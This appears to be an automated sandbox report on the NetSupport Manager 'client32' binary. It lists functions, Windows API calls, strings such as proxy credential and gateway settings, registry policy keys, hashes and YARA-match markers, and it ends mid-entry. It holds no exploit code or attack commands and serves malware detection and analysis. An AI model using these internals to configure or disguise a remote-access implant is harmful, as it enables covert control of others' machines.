Instruction ID: 839cbd99583855d240305defeb44377099afaa71c82f4bb6bc46c0958452e9e8
Opcode Fuzzy Hash: ae551b03b65906b97426a76e9e5f6dedac2389bce539edba93c32e175c85bc09
Instruction Fuzzy Hash: 6A61C474E412259EDB50DFA58C88BDEFBF4AF44318F5040ADE91AA3280EB706A44CF61

Function 1102C925 Relevance: 31.7, APIs: 5, Strings: 13, Instructions: 172COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1102C9AE
wsprintfA.USER32 ref: 1102C9C6
_strncpy.LIBCMT ref: 1102CA80
CharUpperA.USER32(580913,?,?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 1102CAB1

Strings

multipoint=%d, softxpand=%d, pid=%d, xrefs: 1102CB80
computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d, xrefs: 1102CB5A
580913, xrefs: 1102CA7B, 1102CAAC, 1102CADC, 1102CB51
$session$, xrefs: 1102CA26
e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 1102C9E4, 1102CA63
Warning: Unexpanded clientname=<%s>, xrefs: 1102C963
%sessionname%, xrefs: 1102C9F9, 1102CA12
client32 dbi %hs, xrefs: 1102CB33
18/03/14 09:15:42 V12.01F3, xrefs: 1102CB2E
%02d, xrefs: 1102C9A8
%s.%02d, xrefs: 1102C9C0
%session%, xrefs: 1102CA3A
IsA(), xrefs: 1102C9E9, 1102CA68

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$CharUpper_strncpy
String ID: $session$$%02d$%s.%02d$%session%$%sessionname%$18/03/14 09:15:42 V12.01F3$580913$IsA()$Warning: Unexpanded clientname=<%s>$client32 dbi %hs$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d
API String ID: 2270809062-3587621599
Opcode ID: 57a04b5987526aa2e0f8655635961a358d46d212241b8f1881ee851afd3fe5b4
Instruction ID: a7d590d3ef6a482f5e404058edd8043c7c0bcb645db31710f61f6096d8bb4a38
Opcode Fuzzy Hash: 57a04b5987526aa2e0f8655635961a358d46d212241b8f1881ee851afd3fe5b4
Instruction Fuzzy Hash: AB518079E10526AFDB15EB90DC84FEEF378AF45208F4481D9F94967240EB306A44CFA2

Function 6CC719E0 Relevance: 27.6, APIs: 2, Strings: 16, Instructions: 592COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 6CC71C1D
wsprintfA.USER32 ref: 6CC71D99

Strings

ProxyPassword, xrefs: 6CC71D69
Gateway, xrefs: 6CC71AC7
:%d, xrefs: 6CC71C17
UsePinProxy, xrefs: 6CC71B1D
Gateway_UseWebProxy, xrefs: 6CC71AD5, 6CC71B65
ProxyCred, xrefs: 6CC71CA2
P, xrefs: 6CC71C4B
*WebProxy, xrefs: 6CC71A8B
*GatewayAddress, xrefs: 6CC71A68, 6CC71B56
%s:%s, xrefs: 6CC71D93
*PINServer, xrefs: 6CC71B11
PinProxy, xrefs: 6CC71B34
*UseWebProxy, xrefs: 6CC71A74
ProxyUsername, xrefs: 6CC71D52
client247, xrefs: 6CC71CA7
Gateway_WebProxy, xrefs: 6CC71AED, 6CC71B7D

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: wsprintf
String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247
API String ID: 2111968516-2157635994
Opcode ID: 03bf696e814ad98bc1a64345ad3b09270258ab98ff17f84fc505e1db2d59578b
Instruction ID: 2e682f7eea0547b354fb7d510ac3a5173d93ad36f0fd482fc07d1cf0c4a006b1
Opcode Fuzzy Hash: 03bf696e814ad98bc1a64345ad3b09270258ab98ff17f84fc505e1db2d59578b
Instruction Fuzzy Hash: 822288B29042589BDB20CB95CC94EEAB37DFB4A304F0486D9E54DA7A40F6315F898F61

Function 11080710 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 218libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PCIINV.DLL,2F623E72,029333C0,029333B0,?,00000000,11170D2C,000000FF,?,1102FD62,029333C0,00000000,?,?,?), ref: 11080745

Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7

Part of subcall function 11102970: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EDC3F0,?,1110371D,00000000,00000001,?,?,?,?,?,1102F49F), ref: 1110298E

GetProcAddress.KERNEL32(00000000,GetInventory), ref: 1108076B
GetProcAddress.KERNEL32(00000000,Cancel), ref: 1108077F
GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11080793
wsprintfA.USER32 ref: 1108081B
wsprintfA.USER32 ref: 11080832
wsprintfA.USER32 ref: 11080849
CloseHandle.KERNEL32(00000000,11080570,00000001,00000000), ref: 1108099A

Part of subcall function 11080380: CloseHandle.KERNEL32(?,7591F550,?,?,110809C0,?,1102FD62,029333C0,00000000,?,?,?), ref: 11080398
Part of subcall function 11080380: CloseHandle.KERNEL32(?,7591F550,?,?,110809C0,?,1102FD62,029333C0,00000000,?,?,?), ref: 110803AB
Part of subcall function 11080380: CloseHandle.KERNEL32(?,7591F550,?,?,110809C0,?,1102FD62,029333C0,00000000,?,?,?), ref: 110803BE
Part of subcall function 11080380: FreeLibrary.KERNEL32(00000000,7591F550,?,?,110809C0,?,1102FD62,029333C0,00000000,?,?,?), ref: 110803D1

Strings

%s_HW.%s, xrefs: 11080812
GetInventoryEx, xrefs: 11080787
PCIINV.DLL, xrefs: 11080740
Cancel, xrefs: 11080779
GetInventory, xrefs: 11080765
%s_HF.%s, xrefs: 11080843
%s_SW.%s, xrefs: 1108082C

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
API String ID: 4263811268-2492245516
Opcode ID: 900c07cf632ceed795f6062e6b5d6e6eb4405877d5972ec200cb62fa1573293b
Instruction ID: 267f9520f853b8db1f70e2f308a13b3e425cee8e127691eb8cf8de9d489763be
Opcode Fuzzy Hash: 900c07cf632ceed795f6062e6b5d6e6eb4405877d5972ec200cb62fa1573293b
Instruction Fuzzy Hash: A471A2B5E04709AFE710CF75CC41BDAFBE4EB45314F10456AE99AD7284EB74A540CB90

Function 1102ADC0 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 238synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 11102790: SetEvent.KERNEL32(00000000), ref: 111027B4

WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102AE05
GetTickCount.KERNEL32 ref: 1102AE2A

Part of subcall function 110C57C0: __strdup.LIBCMT ref: 110C57DA

GetTickCount.KERNEL32 ref: 1102AF24

Part of subcall function 110C6420: wvsprintfA.USER32(?,?,?), ref: 110C644B

Part of subcall function 110C5870: _free.LIBCMT ref: 110C589D

WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102B01C
CloseHandle.KERNEL32(?), ref: 1102B038

Strings

GetLatLong=%s, took %d ms, xrefs: 1102AF41
_debug, xrefs: 1102AE78, 1102AEDA
LatLong, xrefs: 1102ADE8, 1102AED5
GeoIP, xrefs: 1102AE73
e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 1102B069, 1102B07D, 1102B091, 1102B0A5
http://geo.netsupportsoftware.com/location/loca.asp, xrefs: 1102AE45
?IP=%s, xrefs: 1102AEB6
IsA(), xrefs: 1102B06E, 1102B082, 1102B096, 1102B0AA

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
API String ID: 596640303-3003987893
Opcode ID: 165b91b7d9a921769bc922ddb2d2ba284ce2f74523d9d4310a243ce377b1fcd4
Instruction ID: 57a4b4366f92f46f89141de7e1f67135d68c38a19d5041ed4b9abebe1d7e3f86
Opcode Fuzzy Hash: 165b91b7d9a921769bc922ddb2d2ba284ce2f74523d9d4310a243ce377b1fcd4
Instruction Fuzzy Hash: 6C819E78E00606DFDB05DBA5CC84FEEF7B5AF59708F508258E92167280DB34BA05CBA1

Function 1105CFC0 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1105D01A

Part of subcall function 1105CA00: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1105CA3C
Part of subcall function 1105CA00: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 1105CA94

RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 1105D06B
RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 1105D125
RegCloseKey.ADVAPI32(?), ref: 1105D141

Strings

%s\%s\%s\, xrefs: 1105D0C4
Client, xrefs: 1105D0BA
Client.%04d.%s, xrefs: 1105D0A7
Software\Policies\NetSupport, xrefs: 1105D0BF
Software\Policies\NetSupport\Client, xrefs: 1105D014
Client, xrefs: 1105D028, 1105D158
Standard, xrefs: 1105D086
Software\Policies\NetSupport\Client\Standard, xrefs: 1105D02D
DisableUserPolicies, xrefs: 1105D153

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Enum$Open$CloseValue
String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
API String ID: 2823542970-1528906934
Opcode ID: 7352ea1272703dd1873893fc259baceee137f98d8ff17c55a767f436621e123b
Instruction ID: 49029f40789f99adc4781eb7408dcc231794a4b951f95dab0d46ef244fca2f87
Opcode Fuzzy Hash: 7352ea1272703dd1873893fc259baceee137f98d8ff17c55a767f436621e123b
Instruction Fuzzy Hash: 7F418175E00229ABDB61CB158C85FEEF7B8EB45708F5041D9FA49A6140DAB06E818FA1

Function 6CC64E80 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CCA9898,?,?,6CC6BDFC,00000000), ref: 6CC64E89
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6CC64ED3
SetLastError.KERNEL32(00000078,00000000,00000000,?,?,6CC6BDFC,00000000), ref: 6CC64EE8
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6CC64F07
SetLastError.KERNEL32(00000078,?,?,6CC6BDFC,00000000), ref: 6CC64F1C
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6CC64F3B
SetLastError.KERNEL32(00000078,?,?,6CC6BDFC,00000000), ref: 6CC64F5B
closesocket.WSOCK32(?,00000000,?,?,6CC6BDFC,00000000), ref: 6CC64F72
GetLastError.KERNEL32(?,00000000,?,?,6CC6BDFC,00000000), ref: 6CC64F7B
_memset.LIBCMT ref: 6CC64FA2
LeaveCriticalSection.KERNEL32(6CCA9898,?,?,6CC6BDFC,00000000), ref: 6CC64FC0

Strings

InternetCloseHandle, xrefs: 6CC64ECD, 6CC64F01, 6CC64F35
CloseGatewayConnection - closesocket(%u) FAILED (%d), xrefs: 6CC64F86

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: ErrorLast$AddressProc$CriticalSection$EnterLeave_memsetclosesocket
String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$InternetCloseHandle
API String ID: 3117257897-3125686381
Opcode ID: fc32372933c2e8b335552a4fab48e69054ea9cfeac4ced15b2df991fc5cd5c16
Instruction ID: 3b9e9c1ab955c9a7fefe5230d739a97de980f557f89ebdae2532608d555e4b95
Opcode Fuzzy Hash: fc32372933c2e8b335552a4fab48e69054ea9cfeac4ced15b2df991fc5cd5c16
Instruction Fuzzy Hash: 8631CF36644301EFE710EFAAD988B4A77B4FFA6714F210918E8059BE41E771E845CFA1

Function 1102B5C0 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 284servicesleepCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102C538,00000000,2F623E72,?,00000000,00000000), ref: 1102B7F4
OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102B80A
QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102B81E
CloseServiceHandle.ADVAPI32(00000000), ref: 1102B825
Sleep.KERNEL32(00000032), ref: 1102B836
CloseServiceHandle.ADVAPI32(00000000), ref: 1102B846
Sleep.KERNEL32(000003E8), ref: 1102B892
CloseHandle.KERNEL32(?), ref: 1102B8BF

Strings

NSM.LIC, xrefs: 1102B8F7
>, xrefs: 1102B76B
ProtectedStorage, xrefs: 1102B804
NSA.LIC, xrefs: 1102B906, 1102B90D, 1102B93D

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
API String ID: 83693535-2077998243
Opcode ID: 9b98cabf2bc657b91fee656e7895e92de7935bc05c4c4817cdead5248451a21a
Instruction ID: cf41a154579764f7ce3274c9b2e845f0c1fb444b2ec11e79c6a8ee3683002965
Opcode Fuzzy Hash: 9b98cabf2bc657b91fee656e7895e92de7935bc05c4c4817cdead5248451a21a
Instruction Fuzzy Hash: C7B18075E016259FDB21CF24CC84BEAB7B5AF49708F5441E9E91DAB381DB70AA80CF50

Function 111241A0 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 107COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 11124210
GetTickCount.KERNEL32 ref: 11124241
SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11124254
GetTickCount.KERNEL32 ref: 1112425C

Strings

Warning. SHGetFolderPath took %d ms, xrefs: 11124266
schplayer.exe, xrefs: 11124298
runplugin.exe, xrefs: 111241EE
HasStudentComponents=%d, xrefs: 111242D7
CommonPath, xrefs: 1112427F
Software\NSL, xrefs: 11124284
%s%s, xrefs: 1112420A, 111242AE

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$FolderPathwsprintf
String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
API String ID: 1170620360-4157686185
Opcode ID: b0bcc0f5a6366163d0729c56afd56097aa9a4968172ae497a6bbf09a569205e6
Instruction ID: e5427a7216b44c3460126721b628d5672ac8883cc02d2755d7c854ad9c2544d9
Opcode Fuzzy Hash: b0bcc0f5a6366163d0729c56afd56097aa9a4968172ae497a6bbf09a569205e6
Instruction Fuzzy Hash: 95316DBAF402156BDB009BA5BC85FEAF7BC9FA431DF500469EC04A7145EE70B600CB91

Function 6CC65FC0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 104networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WSOCK32 ref: 6CC65FF2
connect.WSOCK32(00000000,?,000001BB), ref: 6CC66009
WSAGetLastError.WSOCK32(00000000,?,000001BB), ref: 6CC66010
_memmove.LIBCMT ref: 6CC66083
select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,000001BB,00000010,00000002,00000001,00000000,?,00000000), ref: 6CC660A3
GetTickCount.KERNEL32 ref: 6CC660C3
ioctlsocket.WSOCK32(00000000,8004667E,00000001,00000000,?,000001BB), ref: 6CC660F3
SetLastError.KERNEL32(00000000,00000000,8004667E,00000001,00000000,?,000001BB), ref: 6CC660F9
WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,000001BB,00000010,00000002,00000001,00000000,?,00000000), ref: 6CC66111
__WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,000001BB,00000010,00000002,00000001,00000000), ref: 6CC66122

Strings

ConnectTimeout, xrefs: 6CC6602E
General, xrefs: 6CC66033

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
String ID: ConnectTimeout$General
API String ID: 4218156244-3585140716
Opcode ID: 34396916200b202f5b65d226ff9963a24cd962f7077e37d13824055ab3f116ff
Instruction ID: 90de3cdab1e91162f369621b07768c53f8c042028209d5ef29bcc6dfb5c91bc8
Opcode Fuzzy Hash: 34396916200b202f5b65d226ff9963a24cd962f7077e37d13824055ab3f116ff
Instruction Fuzzy Hash: 8A319571900718DFE720CB65CD88BDEB3B9EB44308F0041AAE509D3E41FB719A99CBA5

Function 11025900 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 174sleepCOMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 11025986
_strtok.LIBCMT ref: 110259C0
Sleep.KERNEL32(1102E263,?,*max_sessions,0000000A,00000000,00000000,00000002), ref: 11025AB4

Strings

UseNCS, xrefs: 110259DD
Retrying..., xrefs: 11025AA2
Error. not all transports loaded (%d/%d), xrefs: 11025A88
TCPIP, xrefs: 110259E2
Client, xrefs: 11025976, 11025A1B
LoadTransports(%d), xrefs: 110259FC
*max_sessions, xrefs: 11025A16
Protocols, xrefs: 11025971

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strtok$Sleep
String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
API String ID: 2009458258-3774545468
Opcode ID: cf1052e5be71f3d434893412861ad9ad259e2ba0693b2699e7433d6c9e4175ae
Instruction ID: 451022f22904edf6d43a1c304369e541f9f29d5ed3a23b240bd98eaa3334767d
